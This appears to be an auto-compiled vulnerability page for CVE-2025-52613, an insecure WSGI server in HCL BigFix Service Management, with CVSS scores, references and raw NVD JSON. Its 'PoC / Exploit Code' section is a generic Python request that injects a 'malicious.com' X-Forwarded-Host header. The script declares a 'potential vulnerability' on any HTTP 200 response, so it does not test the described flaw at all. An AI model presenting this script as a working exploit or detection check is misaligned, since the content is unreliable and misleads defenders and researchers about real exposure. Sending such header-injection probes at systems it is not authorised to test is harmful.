CVE-2025-52613

Description

HCL BigFix Service Management (SM) is affected by use of a vulnerable WSGI Server was identified. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE

HCL BigFix Service Management (SM) (请参考厂商官方公告确认具体版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit concept for vulnerable WSGI server
# This script attempts to send a malformed request often associated with WSGI parsing issues.

target_url = "http://target-hcl-bigfix:8080"

# Example payload: Host header injection or request smuggling attempt
headers = {
    "User-Agent": "CVE-2025-52613-Test",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Forwarded-Host": "malicious.com"
}

payload = "test=data"

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print("Response Headers:", response.headers)
    if response.status_code == 200:
        print("Potential vulnerability detected: Server accepted request.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52613
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52613
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52613/
[4] VulDB https://vuldb.com/cve/CVE-2025-52613
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52613", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:08.247", "lastModified": "2026-05-07T14:59:40.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) is affected by use of a vulnerable WSGI Server was identified. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}